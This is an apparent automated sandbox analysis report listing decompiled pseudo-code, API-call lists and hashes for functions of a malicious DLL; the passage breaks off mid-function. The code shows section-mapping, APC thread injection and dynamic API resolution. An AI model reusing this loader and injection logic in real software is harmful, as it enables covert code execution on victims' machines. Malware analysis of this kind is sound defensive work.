    C-Code - Quality: 68%
    			E6E1D1EC7(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







    0x6e1d1ed9
    0x6e1d1edf
    0x6e1d1eed
    0x6e1d1ef4
    0x6e1d1ef9
    0x6e1d1eff
    0x00000000
    0x6e1d1f00
    0x00000000

    APIs
    • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E1D1C0E,00000002,00000000,?,?,00000000,?,?,6E1D1C0E,00000000), ref: 6E1D1EF4
    Memory Dump Source
    • Source File: 00000003.00000002.613044435.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000003.00000002.613025498.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613065340.000000006E1D3000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613101446.000000006E1D5000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.613130163.000000006E1D6000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: SectionView
    • String ID:
    • API String ID: 1323581903-0
    • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
    • Instruction ID: 871ded7bfee9792561d44979ecdcfaab209d40f906581020f1540981c966c560
    • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
    • Instruction Fuzzy Hash: C1F01CB6A0420CBFEB119FA9CC85C9FBBBDEB44394B104939B552E1090D6309E4C9A60
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21207B, Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 338COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6E20FA06: GetLastError.KERNEL32(0000001C,00000000,6E209156,00000000,00000000,?,6E2127FC,00000000,00000000,?,?,0000001C), ref: 6E20FA0A
      • Part of subcall function 6E20FA06: _free.LIBCMT ref: 6E20FA3D
      • Part of subcall function 6E20FA06: SetLastError.KERNEL32(00000000,00000000,?,?,0000001C), ref: 6E20FA7E
      • Part of subcall function 6E20FA06: _abort.LIBCMT ref: 6E20FA84
    • _memcmp.LIBVCRUNTIME ref: 6E212325
    • _free.LIBCMT ref: 6E212396
    • _free.LIBCMT ref: 6E2123AF
    • _free.LIBCMT ref: 6E2123E1
    • _free.LIBCMT ref: 6E2123EA
    • _free.LIBCMT ref: 6E2123F6
    • GetStartupInfoW.KERNEL32(?), ref: 6E212453
    • GetFileType.KERNEL32(?,6E21142E,?,00000004), ref: 6E2124BC
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: _free$ErrorLast$FileInfoStartupType_abort_memcmp
    • String ID: C
    • API String ID: 1665419104-1037565863
    • Opcode ID: 987f115976a34fd9866eb3c05aa2d1462c06c1601dff1526aff3cc90926af6a4
    • Instruction ID: 73c8824c82be70c9eb7f83ab1fb2f4e2d83951ec96ac474735085808f828b446
    • Opcode Fuzzy Hash: 987f115976a34fd9866eb3c05aa2d1462c06c1601dff1526aff3cc90926af6a4
    • Instruction Fuzzy Hash: 5ED15DB6A0521ADFDB24CF58C894ADDB7F6FB49304F10459AE949A7350D731AE80CF40
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1D1C7D, Relevance: 15.1, APIs: 10, Instructions: 103threadsleepsynchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 80%
    			E6E1D1C7D(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E6E1D1F10();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E6E1D18AD(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E6E1D1ADB(_t45); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E6E1D13D1(E6E1D14E8,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E6E1D134F(_t45,  &_v48) != 0) {
					 *0x6e1d41b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t37 =  *_t57(_t44, 0, 0); // executed
				_t50 = _t37;
				if(_t50 == 0) {
					L9:
					 *0x6e1d41b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E6E1D1B58(_t50 + _t15);
				 *0x6e1d41b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50); // executed
					E6E1D142F(_t44);
					goto L11;
				}
			}






















    0x6e1d1c89
    0x6e1d1c92
    0x6e1d1c96
    0x6e1d1d9e
    0x6e1d1da4
    0x00000000
    0x00000000
    0x00000000
    0x6e1d1c9c
    0x6e1d1c9c
    0x6e1d1ca1
    0x6e1d1ca7
    0x6e1d1cb6
    0x6e1d1cb7
    0x6e1d1cba
    0x6e1d1cbd
    0x6e1d1cc6
    0x6e1d1cca
    0x6e1d1cd0
    0x6e1d1cd4
    0x6e1d1cdb
    0x00000000
    0x00000000
    0x6e1d1ce1
    0x6e1d1ce8
    0x6e1d1cec
    0x6e1d1d8f
    0x6e1d1d8f
    0x6e1d1d96
    0x6e1d1d98
    0x6e1d1d98
    0x00000000
    0x6e1d1d96
    0x6e1d1cf5
    0x6e1d1d48
    0x6e1d1d48
    0x6e1d1d59
    0x6e1d1d5d
    0x6e1d1d8b
    0x6e1d1d5f
    0x6e1d1d62
    0x6e1d1d6a
    0x6e1d1d6e
    0x6e1d1d76
    0x6e1d1d76
    0x6e1d1d7d
    0x6e1d1d7d
    0x00000000
    0x6e1d1d5d
    0x6e1d1d03
    0x6e1d1d42
    0x00000000
    0x6e1d1d42
    0x6e1d1d05
    0x6e1d1d09
    0x6e1d1d12
    0x6e1d1d14
    0x6e1d1d18
    0x6e1d1d3a
    0x6e1d1d3a
    0x00000000
    0x6e1d1d3a
    0x6e1d1d1a
    0x6e1d1d1f
    0x6e1d1d26
    0x6e1d1d2b
    0x00000000
    0x6e1d1d2d
    0x6e1d1d30
    0x6e1d1d33
    0x00000000
    0x6e1d1d33

    APIs
      • Part of subcall function 6E1D1F10: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1D1C8E,747863F0,00000000), ref: 6E1D1F1F
      • Part of subcall function 6E1D1F10: GetVersion.KERNEL32 ref: 6E1D1F2E
      • Part of subcall function 6E1D1F10: GetCurrentProcessId.KERNEL32 ref: 6E1D1F3D
      • Part of subcall function 6E1D1F10: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1D1F56
    • GetSystemTime.KERNEL32(?,747863F0,00000000), ref: 6E1D1CA1
    • SwitchToThread.KERNEL32 ref: 6E1D1CA7
      • Part of subcall function 6E1D18AD: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E1D1903
      • Part of subcall function 6E1D18AD: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E1D19C9
    • Sleep.KERNELBASE(00000000,00000000), ref: 6E1D1CCA
    • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1D1D12
    • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1D1D30
    • WaitForSingleObject.KERNEL32(00000000,000000FF,6E1D14E8,?,00000000), ref: 6E1D1D62
    • GetExitCodeThread.KERNEL32(00000000,?), ref: 6E1D1D76
    • CloseHandle.KERNEL32(00000000), ref: 6E1D1D7D
    • GetLastError.KERNEL32(6E1D14E8,?,00000000), ref: 6E1D1D85
    • GetLastError.KERNEL32 ref: 6E1D1D98
    Memory Dump Source
    • Source File: 00000003.00000002.613044435.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000003.00000002.613025498.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613065340.000000006E1D3000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613101446.000000006E1D5000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.613130163.000000006E1D6000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
    • String ID:
    • API String ID: 1962885430-0
    • Opcode ID: 7062d4a94be4b570bdd2732fbdd9c499b5bdffd9f7fffc8c8ea3dfb49e452dd9
    • Instruction ID: 07b31985540356b392f0d364bc7c63098182c6802e3a666160015cae0fc417c6
    • Opcode Fuzzy Hash: 7062d4a94be4b570bdd2732fbdd9c499b5bdffd9f7fffc8c8ea3dfb49e452dd9
    • Instruction Fuzzy Hash: 0C318171705B05ABC750DFE5884CA9F77EDEE96354B204A1AF8A4C2140EB30D98DE7A2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1D1144, Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
    Download Yara Rule
    C-Code - Quality: 69%
    			E6E1D1144(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6E1D2210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6e1d41d0;
				_push(_t15 + 0x6e1d505e);
				_push(_t15 + 0x6e1d5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6E1D220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6e1d41c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














    0x6e1d1144
    0x6e1d114d
    0x6e1d1151
    0x6e1d1157
    0x6e1d115c
    0x6e1d1161
    0x6e1d1164
    0x6e1d1167
    0x6e1d116c
    0x6e1d116d
    0x6e1d1170
    0x6e1d117b
    0x6e1d1182
    0x6e1d1186
    0x6e1d1188
    0x6e1d1189
    0x6e1d118c
    0x6e1d1191
    0x6e1d119b
    0x6e1d119d
    0x6e1d119d
    0x6e1d11b1
    0x6e1d11b7
    0x6e1d11bb
    0x6e1d120b
    0x6e1d11bd
    0x6e1d11c6
    0x6e1d11dc
    0x6e1d11e4
    0x6e1d11f6
    0x6e1d11fa
    0x00000000
    0x00000000
    0x6e1d11e6
    0x6e1d11e9
    0x6e1d11ee
    0x6e1d11f0
    0x6e1d11f0
    0x6e1d11d1
    0x6e1d11d3
    0x6e1d11fc
    0x6e1d11fd
    0x6e1d11fd
    0x6e1d11c6
    0x6e1d1213

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E1D156A,0000000A,?,?), ref: 6E1D1151
    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E1D1167
    • _snwprintf.NTDLL ref: 6E1D118C
    • CreateFileMappingW.KERNELBASE(000000FF,6E1D41C0,00000004,00000000,?,?), ref: 6E1D11B1
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1D156A,0000000A,?), ref: 6E1D11C8
    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E1D11DC
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1D156A,0000000A,?), ref: 6E1D11F4
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E1D156A,0000000A), ref: 6E1D11FD
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1D156A,0000000A,?), ref: 6E1D1205
    Memory Dump Source
    • Source File: 00000003.00000002.613044435.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000003.00000002.613025498.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613065340.000000006E1D3000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613101446.000000006E1D5000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.613130163.000000006E1D6000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
    • String ID:
    • API String ID: 1724014008-0
    • Opcode ID: 7d9625259219ecf6309964ef5b5e5b6ff8e232c42fa424aa6d1cc8e37b2af4e0
    • Instruction ID: 6c4ce8a0db0f3a5bdc8ac750af8b6df24980265d7be3ca29118bd86018335c22
    • Opcode Fuzzy Hash: 7d9625259219ecf6309964ef5b5e5b6ff8e232c42fa424aa6d1cc8e37b2af4e0
    • Instruction Fuzzy Hash: 932183B260111CBFDB11AFE8CC88E9E7BB9EB59354F218125F621E7180D6315989EB60
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20A041, Relevance: 9.2, APIs: 6, Instructions: 200COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: __cftoe
    • String ID:
    • API String ID: 4189289331-0
    • Opcode ID: e6682ec384ca5461758dcd0997baf4677d3f174a67c6bd07f05a94401ed8e746
    • Instruction ID: 8d3034cee356fc301ecd999ca4d6be149ba8bb3181e767e250a58826fac432bd
    • Opcode Fuzzy Hash: e6682ec384ca5461758dcd0997baf4677d3f174a67c6bd07f05a94401ed8e746
    • Instruction Fuzzy Hash: 985119B640420FABDB508FE88C40FDE77BFAF49325F904519E825A61D5EB71CA408A64
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1D1060, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E1D1060(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6E1D1B58(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6e1d41d0 + 0x6e1d5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6e1d41d0 + 0x6e1d50e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6E1D142F(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6e1d41d0 + 0x6e1d50f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6e1d41d0 + 0x6e1d5104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6e1d41d0 + 0x6e1d5119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6e1d41d0 + 0x6e1d512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6E1D1B9C(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












    0x6e1d106e
    0x6e1d1072
    0x6e1d1133
    0x6e1d1078
    0x6e1d1090
    0x6e1d109f
    0x6e1d10a6
    0x6e1d10aa
    0x6e1d10ad
    0x6e1d112b
    0x6e1d112c
    0x6e1d10af
    0x6e1d10bc
    0x6e1d10c0
    0x6e1d10c3
    0x00000000
    0x6e1d10c5
    0x6e1d10d2
    0x6e1d10d6
    0x6e1d10d9
    0x00000000
    0x6e1d10db
    0x6e1d10e8
    0x6e1d10ec
    0x6e1d10ef
    0x00000000
    0x6e1d10f1
    0x6e1d10fe
    0x6e1d1102
    0x6e1d1105
    0x00000000
    0x6e1d1107
    0x6e1d110d
    0x6e1d1113
    0x6e1d1118
    0x6e1d111f
    0x6e1d1122
    0x00000000
    0x6e1d1124
    0x6e1d1127
    0x6e1d1127
    0x6e1d1122
    0x6e1d1105
    0x6e1d10ef
    0x6e1d10d9
    0x6e1d10c3
    0x6e1d10ad
    0x6e1d1141

    APIs
      • Part of subcall function 6E1D1B58: HeapAlloc.KERNEL32(00000000,?,6E1D1702,?,00000000,00000000,?,?,?,6E1D1CE6), ref: 6E1D1B64
    • GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6E1D1480,?,?,?,?,00000002,00000000,?,?), ref: 6E1D1084
    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1D10A6
    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1D10BC
    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1D10D2
    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1D10E8
    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1D10FE
      • Part of subcall function 6E1D1B9C: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,?), ref: 6E1D1BF9
      • Part of subcall function 6E1D1B9C: memset.NTDLL ref: 6E1D1C1B
    Memory Dump Source
    • Source File: 00000003.00000002.613044435.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000003.00000002.613025498.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613065340.000000006E1D3000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613101446.000000006E1D5000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.613130163.000000006E1D6000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
    • String ID:
    • API String ID: 1632424568-0
    • Opcode ID: 84700492cb04186466488251de545cd05acbe1eaf8ad2e05bedc060b39a5b491
    • Instruction ID: 90ea901f1cdba8bbc3a183b3771328565128a39a7db44adb713e55eb150c642d
    • Opcode Fuzzy Hash: 84700492cb04186466488251de545cd05acbe1eaf8ad2e05bedc060b39a5b491
    • Instruction Fuzzy Hash: 90218DF1600A0BDFDB40EFA9DC80E9A7BFCFB55244B108425E945D7200E730E94AABA0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1D1DAE, Relevance: 9.1, APIs: 6, Instructions: 71memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 86%
    			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6e1d4188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6e1d418c;
						if( *0x6e1d418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6e1d4198;
								if( *0x6e1d4198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6e1d418c);
						}
						HeapDestroy( *0x6e1d4190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6e1d4188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x6e1d4190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6e1d41b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6E1D13D1(E6E1D20CE, E6E1D121C(_a12, 1, 0x6e1d4198, _t41));
							 *0x6e1d418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












    0x6e1d1db1
    0x6e1d1dbd
    0x6e1d1dbf
    0x6e1d1dc2
    0x6e1d1e38
    0x6e1d1e3e
    0x6e1d1e40
    0x6e1d1e42
    0x6e1d1e48
    0x6e1d1e4a
    0x6e1d1e4f
    0x6e1d1e52
    0x6e1d1e5d
    0x6e1d1e5f
    0x00000000
    0x00000000
    0x6e1d1e61
    0x6e1d1e64
    0x6e1d1e66
    0x00000000
    0x00000000
    0x00000000
    0x6e1d1e66
    0x6e1d1e6e
    0x6e1d1e6e
    0x6e1d1e7a
    0x6e1d1e7a
    0x6e1d1dc4
    0x6e1d1dc5
    0x6e1d1de5
    0x6e1d1deb
    0x6e1d1ded
    0x6e1d1df2
    0x6e1d1e2e
    0x6e1d1e2e
    0x6e1d1df4
    0x6e1d1dfc
    0x6e1d1e03
    0x6e1d1e0d
    0x6e1d1e19
    0x6e1d1e20
    0x6e1d1e25
    0x6e1d1e2a
    0x00000000
    0x6e1d1e2a
    0x6e1d1e25
    0x6e1d1df2
    0x6e1d1dc5
    0x6e1d1e87

    APIs
    • InterlockedIncrement.KERNEL32(6E1D4188), ref: 6E1D1DD0
    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E1D1DE5
      • Part of subcall function 6E1D13D1: CreateThread.KERNELBASE ref: 6E1D13E8
      • Part of subcall function 6E1D13D1: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1D13FD
      • Part of subcall function 6E1D13D1: GetLastError.KERNEL32(00000000), ref: 6E1D1408
      • Part of subcall function 6E1D13D1: TerminateThread.KERNEL32(00000000,00000000), ref: 6E1D1412
      • Part of subcall function 6E1D13D1: CloseHandle.KERNEL32(00000000), ref: 6E1D1419
      • Part of subcall function 6E1D13D1: SetLastError.KERNEL32(00000000), ref: 6E1D1422
    • InterlockedDecrement.KERNEL32(6E1D4188), ref: 6E1D1E38
    • SleepEx.KERNEL32(00000064,00000001), ref: 6E1D1E52
    • CloseHandle.KERNEL32 ref: 6E1D1E6E
    • HeapDestroy.KERNEL32 ref: 6E1D1E7A
    Memory Dump Source
    • Source File: 00000003.00000002.613044435.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000003.00000002.613025498.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613065340.000000006E1D3000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613101446.000000006E1D5000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.613130163.000000006E1D6000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
    • String ID:
    • API String ID: 2110400756-0
    • Opcode ID: 08d54663fc0612a08558217fc986fa67faed0d0d165539249326d41958ea387f
    • Instruction ID: 5247b8ce3e17a9997991e3490697f5c2dec9f4547f943302333f935a3cb23851
    • Opcode Fuzzy Hash: 08d54663fc0612a08558217fc986fa67faed0d0d165539249326d41958ea387f
    • Instruction Fuzzy Hash: DF21D235701605BFDB019FE9CC88A4E7BACFB663607208529F514D3140D338A98EFB60
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1D13D1, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E1D13D1(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e1d41cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}








    0x6e1d13e8
    0x6e1d13ee
    0x6e1d13f2
    0x6e1d13fd
    0x6e1d1405
    0x6e1d140e
    0x6e1d1412
    0x6e1d1419
    0x6e1d1420
    0x6e1d1422
    0x6e1d1428
    0x6e1d1405
    0x6e1d142c

    APIs
    • CreateThread.KERNELBASE ref: 6E1D13E8
    • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1D13FD
    • GetLastError.KERNEL32(00000000), ref: 6E1D1408
    • TerminateThread.KERNEL32(00000000,00000000), ref: 6E1D1412
    • CloseHandle.KERNEL32(00000000), ref: 6E1D1419
    • SetLastError.KERNEL32(00000000), ref: 6E1D1422
    Memory Dump Source
    • Source File: 00000003.00000002.613044435.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000003.00000002.613025498.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613065340.000000006E1D3000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613101446.000000006E1D5000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.613130163.000000006E1D6000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
    • String ID:
    • API String ID: 3832013932-0
    • Opcode ID: 4066340a42ac7d6fc6d071a386dbcdd346ba81020130e0ae233a2b4e76299f53
    • Instruction ID: f22c1fe381fb6d9aa1f8b7ea483b31cbf04713c2ba731d03a0131b6df0d3ca60
    • Opcode Fuzzy Hash: 4066340a42ac7d6fc6d071a386dbcdd346ba81020130e0ae233a2b4e76299f53
    • Instruction Fuzzy Hash: 92F03936206E25BBDB225FB08C4CF9FBF69FF0A751F04C514F60991150C7218856BBA5
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1D18AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 90%
    			E6E1D18AD(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				unsigned int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				void* _v48;
				signed int _v56;
				signed int _v60;
				intOrPtr _t50;
				void* _t57;
				void* _t61;
				signed int _t67;
				signed char _t69;
				signed char _t70;
				void* _t76;
				intOrPtr _t77;
				unsigned int _t82;
				intOrPtr _t86;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				signed int _t93;

				_t90 =  *0x6e1d41b0;
				_t50 = E6E1D1000(_t90,  &_v28,  &_v20);
				_v24 = _t50;
				if(_t50 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
					_t91 = _t90 + _v28;
					_v48 = _t91;
					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_t76 = _t57;
					_v36 = _t76;
					if(_t76 == 0) {
						_v24 = 8;
					} else {
						_t69 = 0;
						if(_t67 <= 0) {
							_t77 =  *0x6e1d41cc;
						} else {
							_t86 = _a4;
							_v8 = _t91;
							_v8 = _v8 - _t76;
							_t14 = _t86 + 0x6e1d5137; // 0x3220a9c2
							_t61 = _t57 - _t91 + _t14;
							_v16 = _t76;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t70 = _t69 + 1;
								_v44 = _t70;
								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
								if(_t82 != 0) {
									_v32 = _v32 & 0x00000000;
									_t89 = _v16;
									_v12 = 0x400;
									do {
										_t93 =  *((intOrPtr*)(_v8 + _t89));
										_v40 = _t93;
										if(_t93 == 0) {
											_v12 = 1;
										} else {
